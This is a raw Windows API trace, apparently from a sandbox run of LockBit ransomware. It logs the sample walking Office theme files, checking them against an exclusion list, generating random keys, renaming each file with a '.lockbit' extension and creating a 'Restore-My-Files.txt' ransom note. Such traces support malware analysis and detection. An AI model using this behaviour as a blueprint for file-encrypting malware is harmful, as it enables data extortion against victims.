ftCreationTime.dwLowDateTime=0x81f86400, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c62e40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x81f86400, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x106e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Slipstream.thmx", cAlternateFileName="SLIPST~1.THM")) returned 1 [0190.669] lstrcmpiW (lpString1=".", lpString2="Slipstream.thmx") returned -1 [0190.669] lstrcmpiW (lpString1="..", lpString2="Slipstream.thmx") returned -1 [0190.669] PathFindExtensionW (pszPath="Slipstream.thmx") returned=".thmx" [0190.669] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.669] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.669] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.669] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.669] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.669] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.669] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.669] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.669] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.670] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.670] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Slipstream.thmx") returned -1 [0190.671] lstrcmpiW (lpString1="ntldr", lpString2="Slipstream.thmx") returned -1 [0190.671] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Slipstream.thmx") returned -1 [0190.671] lstrcmpiW (lpString1="bootsect.bak", lpString2="Slipstream.thmx") returned -1 [0190.671] lstrcmpiW (lpString1="autorun.inf", lpString2="Slipstream.thmx") returned -1 [0190.671] lstrcmpiW (lpString1="thumbs.db", lpString2="Slipstream.thmx") returned 1 [0190.671] lstrcmpiW (lpString1="iconcache.db", lpString2="Slipstream.thmx") returned -1 [0190.671] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.671] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx") returned=".thmx" [0190.671] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.671] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.671] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.672] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.672] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx.lockbit") returned 77 [0190.672] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\slipstream.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0190.678] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.678] malloc (_Size=0x40068) returned 0x3e70008 [0190.678] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=67304) returned 1 [0190.678] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.678] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0190.678] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.679] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0190.679] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0190.682] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.682] malloc (_Size=0xb0) returned 0x1fa2ed8 [0190.682] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xb0, FileInformationClass=0xa) returned 0x0 [0190.684] free (_Block=0x1fa2ed8) [0190.684] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.684] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.684] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.684] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c23bc00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c62e40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2c23bc00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x124a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Solstice.thmx", cAlternateFileName="SOLSTI~1.THM")) returned 1 [0190.684] lstrcmpiW (lpString1=".", lpString2="Solstice.thmx") returned -1 [0190.684] lstrcmpiW (lpString1="..", lpString2="Solstice.thmx") returned -1 [0190.684] PathFindExtensionW (pszPath="Solstice.thmx") returned=".thmx" [0190.684] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.685] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.686] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.686] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Solstice.thmx") returned -1 [0190.687] lstrcmpiW (lpString1="ntldr", lpString2="Solstice.thmx") returned -1 [0190.687] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Solstice.thmx") returned -1 [0190.687] lstrcmpiW (lpString1="bootsect.bak", lpString2="Solstice.thmx") returned -1 [0190.687] lstrcmpiW (lpString1="autorun.inf", lpString2="Solstice.thmx") returned -1 [0190.687] lstrcmpiW (lpString1="thumbs.db", lpString2="Solstice.thmx") returned 1 [0190.687] lstrcmpiW (lpString1="iconcache.db", lpString2="Solstice.thmx") returned -1 [0190.687] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.687] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx") returned=".thmx" [0190.687] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.687] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.687] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.688] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.689] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.689] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.689] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.689] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.689] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.689] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.689] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx.lockbit") returned 75 [0190.689] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\solstice.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0190.696] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.697] malloc (_Size=0x40068) returned 0x3d70450 [0190.697] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=74912) returned 1 [0190.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0190.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0190.698] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0190.705] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.705] malloc (_Size=0xac) returned 0x1fa2ed8 [0190.705] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xac, FileInformationClass=0xa) returned 0x0 [0190.706] free (_Block=0x1fa2ed8) [0190.706] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.706] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.706] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.707] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fb74300, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c88fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2fb74300, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x10d83, dwReserved0=0x0, dwReserved1=0x0, cFileName="Technic.thmx", cAlternateFileName="TECHNI~1.THM")) returned 1 [0190.707] lstrcmpiW (lpString1=".", lpString2="Technic.thmx") returned -1 [0190.707] lstrcmpiW (lpString1="..", lpString2="Technic.thmx") returned -1 [0190.707] PathFindExtensionW (pszPath="Technic.thmx") returned=".thmx" [0190.707] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.707] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.708] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.708] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.709] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.709] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.709] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.709] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.709] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.709] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.709] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.709] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Technic.thmx") returned -1 [0190.709] lstrcmpiW (lpString1="ntldr", lpString2="Technic.thmx") returned -1 [0190.709] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Technic.thmx") returned -1 [0190.709] lstrcmpiW (lpString1="bootsect.bak", lpString2="Technic.thmx") returned -1 [0190.709] lstrcmpiW (lpString1="autorun.inf", lpString2="Technic.thmx") returned -1 [0190.709] lstrcmpiW (lpString1="thumbs.db", lpString2="Technic.thmx") returned 1 [0190.709] lstrcmpiW (lpString1="iconcache.db", lpString2="Technic.thmx") returned -1 [0190.709] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.709] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx") returned=".thmx" [0190.709] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.709] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.709] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.709] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.709] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 